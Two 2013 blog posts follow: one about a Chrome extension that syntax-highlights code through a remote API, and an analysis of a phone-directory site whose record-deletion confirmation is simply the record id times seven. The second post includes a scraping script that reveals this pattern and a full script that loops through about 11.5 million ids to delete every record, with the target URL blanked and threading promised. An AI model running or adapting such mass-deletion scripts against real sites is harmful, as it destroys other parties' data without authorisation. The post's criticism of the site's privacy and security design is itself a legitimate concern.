Saturday, 23 March 2013


After testing Blogger, I observed that it doesn't recognize the [code] tags used to syntax-highlight code (as WordPress does). There are a few alternatives, like adding some lines to the template code or using an online service to generate syntax-highlighted HTML for your code.

I wrote a Chrome extension that allows you to syntax-highlight code. It makes a POST request to a remote API with the code body, language, style, etc., and all processing happens server-side. The service uses Pygments at its core.
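To make the request shape concrete, here is a minimal sketch of how such a POST body could be assembled. The extension itself would do this in JavaScript; this is Python 3 for illustration only. The endpoint URL and the field names (`code`, `lexer`, `style`) are assumptions, not the real API's, and the request is only built, never sent.

```python
from urllib.parse import urlencode, parse_qs
from urllib.request import Request

# Hypothetical endpoint and field names, for illustration only.
API_URL = "https://highlighter.invalid/api"

def build_highlight_request(code, language, style):
    """Build (but do not send) a form-encoded POST request."""
    body = urlencode({"code": code, "lexer": language, "style": style})
    # Supplying a data payload makes urllib treat the request as a POST.
    return Request(API_URL, data=body.encode("utf-8"))

req = build_highlight_request('print("hi")', "python", "monokai")
print(req.get_method())
print(parse_qs(req.data.decode("utf-8")))
```

The server would then be expected to return the highlighted HTML, which the popup drops into the textarea.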

It's a popup window that allows you to paste code and select a language and a highlighting colour scheme.

Clicking the Highlight button will replace the code in the textarea with the generated HTML and show a preview below.

Download (Load unpacked extension in Chrome and point to the extracted folder)

Have any suggestions, issues, bugs, requests? :

This is by no means a finished product, and I will probably publish it to the Chrome web store once stable.

Friday, 22 March 2013

Analysis of a Bad web-app

Alright, I can't really call this an app; it's more like a search engine ... that allows you to delete its records.

This website pissed me off as it makes ~11.5 million telephone records and related information (name, address) publicly searchable and indexable. I guess Google has already indexed all of the pages, and even if you delete a record, the information is still accessible in the search result descriptions, not to mention caches. It supposedly takes its data from BSNL's searchable but non-indexable directory. I could go on about how this is a privacy issue, but I'll leave that for another post.


 There's a tiny delete button at the bottom that takes you to such a page.

There's an id parameter (passed through the content body) associated with each telephone record, which I suppose is the database id of the record. The delete page asks you to solve a simple addition as confirmation. The numbers of that equation are a textual part of the DOM and can be scraped to automate deletion of a record. I wrote a Python script to parse the HTML using a regex and retrieve those numbers:

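    import re
    import urllib
    import urllib2

    # Matches the two operands of the "a + b" equation on the delete page.
    equation = re.compile(r'(\d+) \+ (\d+)')
    p_url = ''

    for counter in range(800000, 800005):
        params = {
            'id': counter,
            'Remove this entry': 'Remove this number from the site'
        }
        req = urllib2.Request(url=p_url, data=urllib.urlencode(params))
        phunwa = urllib2.urlopen(req)
        source = phunwa.read()
        numbers = equation.findall(source)
        for num in numbers:
            # Print the id, both operands, and their sum (the expected answer).
            print "id: %s | %s + %s = %s" % \
                (counter, num[0], num[1], int(num[0]) + int(num[1]))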

Which gives the following output:

id: 800000 | 119805 + 5480195 = 5600000
id: 800001 | 787730 + 4812277 = 5600007
id: 800002 | 534978 + 5065036 = 5600014
id: 800003 | 155396 + 5444625 = 5600021
id: 800004 | 88748 + 5511280 = 5600028

For each increment of the id, the answer increments by 7 (even though the two numbers themselves are generated differently each time), which can only mean one thing:

Whoever designed this thing never heard of reCAPTCHA. It doesn't even verify whether the referrer (which is the URL containing the phone number associated with the id) is correct, but that's too much to ask for, considering the confirmation method they chose to implement is answer = id*7.
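The id*7 relationship can be checked offline against the five output lines shown earlier. This is a minimal sketch in Python 3 (unlike the Python 2 scripts in this post); the helper and variable names are made up for illustration, and nothing here talks to the site.

```python
import re

# Output lines copied from the scraping run shown earlier in this post.
observed = """\
id: 800000 | 119805 + 5480195 = 5600000
id: 800001 | 787730 + 4812277 = 5600007
id: 800002 | 534978 + 5065036 = 5600014
id: 800003 | 155396 + 5444625 = 5600021
id: 800004 | 88748 + 5511280 = 5600028
"""

line_re = re.compile(r"id: (\d+) \| (\d+) \+ (\d+) = (\d+)")

def check_pattern(text):
    """Return (id, sum, sum == 7 * id) for every output line found."""
    results = []
    for rec_id, a, b, total in line_re.findall(text):
        rec_id, a, b, total = int(rec_id), int(a), int(b), int(total)
        assert a + b == total  # the printed sum matches its operands
        results.append((rec_id, total, total == 7 * rec_id))
    return results

results = check_pattern(observed)
for rec_id, total, matches in results:
    print(rec_id, total, matches)
```

Every line satisfies sum == 7 * id, so the random-looking operands add no protection: the answer is fully determined by the id.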

The total number of records could be around 11,547,208; that's the highest the id goes before the site returns a 500. In theory, it is thus possible to delete every record on the site without user intervention at any point, apart from renting an EC2 instance and running this script:

import re
import urllib
import urllib2

def annihilate_phunwa():
  p_url = ''

  # xrange avoids building an 11.5-million-element list in Python 2.
  for counter in xrange(1, 11547209):
    params = {
      'id' : counter,
      'answer' : (counter*7),
      'Confirm Delete' : 'Submit Query'
    }
    try:
      req = urllib2.Request(url=p_url, data=urllib.urlencode(params))
      phunwa = urllib2.urlopen(req)
    except urllib2.HTTPError as e:
      # A 500 response suggests the record no longer exists.
      if e.code == 500:
        print 'id=%s may already be deleted!' % counter
      else:
        print 'Something else has gone wrong!'


I may update this code with one that implements threading.